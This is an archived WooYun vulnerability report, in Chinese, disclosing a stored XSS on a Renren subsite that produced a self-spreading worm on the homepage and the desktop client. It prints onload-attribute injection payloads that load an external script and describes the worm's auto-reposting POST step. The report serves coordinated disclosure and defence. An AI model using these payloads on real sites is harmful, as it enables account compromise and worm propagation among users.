当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023391

漏洞标题:人人网又一大波蠕虫,位置在首页+登录就中招+通杀网页和人人桌面

相关厂商:人人网

漏洞作者: px1624

提交时间:2013-05-09 20:37

修复时间:2013-06-23 20:38

公开时间:2013-06-23 20:38

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-09: 细节已通知厂商并且等待厂商处理中
2013-05-09: 厂商已经确认,细节仅向厂商公开
2013-05-19: 细节向核心白帽子及相关领域专家公开
2013-05-29: 细节向普通白帽子公开
2013-06-08: 细节向实习白帽子公开
2013-06-23: 细节向公众公开

简要描述:

人人网某分站储存xss,导致人人网首页大范围蠕虫。。。
位置在首页+登录就中招+通杀网页和人人桌面=20rank。
由于是只要登录就会中招,而且通杀人人网页和人人桌面(手机登录没去试不清楚)。
所以蠕虫传播速度和范围也是相当的快,危害大大的。。
已经习惯人人网的thx了,所以礼物神马的也就不提了,反正提了他们也不会给。。。

详细说明:

1 分站地址:http://photowoo.renren.com/?ngAdID=04P55
2 xss缺陷的原因及位置,上传作品的图片地址没有过滤。

1.png


3 抓包修改图片地址参数(此处有过滤><没过滤")。

2.png


调用外部js的话,用以下两种方式都可以(构造闭合就行了)。

" onload="jQuery.getScript('js文件地址')
" onload="with(document)body.appendChild(createElement('script')).src='js文件地址'


4 成功后会自动显示加载到人人网首页,别人登录人人网会自动加载到新鲜事中。图片的onload执行,无需交互,登录就中招,并且导致xss蠕虫。。。

3.png

漏洞证明:

1 别人的帐号,随便登录了几个。

5.png


6.png


2 可以看到登录进入首页就会加载别人的新鲜事图片,那么就会中招。人人桌面也会被通杀~

9.png


这里的图我是插了个纯白的的图片。

10.png


3 蠕虫证明、、、这个很简单额,xss的外部js文件中写一个post请求,发一条同样的带有xss的新鲜事就可以了。
其他比如发状态之类的,也都可以通过post在js中写入post请求来完成。

7.png


一大波蠕虫啊,人人网果然很不安全额。。。

修复方案:

1 由于你们的业务线也蛮长的,http-only你们肯定是不可能回去做了。
2 那就过滤下特殊字符吧,反正你们这个是个潜在的,一直存在的问题。就是只要随便一个分站的小小的xss,就可以导致主站甚至是首页的蠕虫攻击。。
3 由于这次蠕虫位置在首页,传播无需交互,所以危害比之前的都严重额。
这个20rank应该还是有的额,除非用户对于人人网来说,没有任何价值,人人网一点都不关心用于的隐私信息等。。。

版权声明:转载请注明来源 px1624@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-05-09 23:22

厂商回复:

啊 感谢感谢!求地址 送礼物!

最新状态:

暂无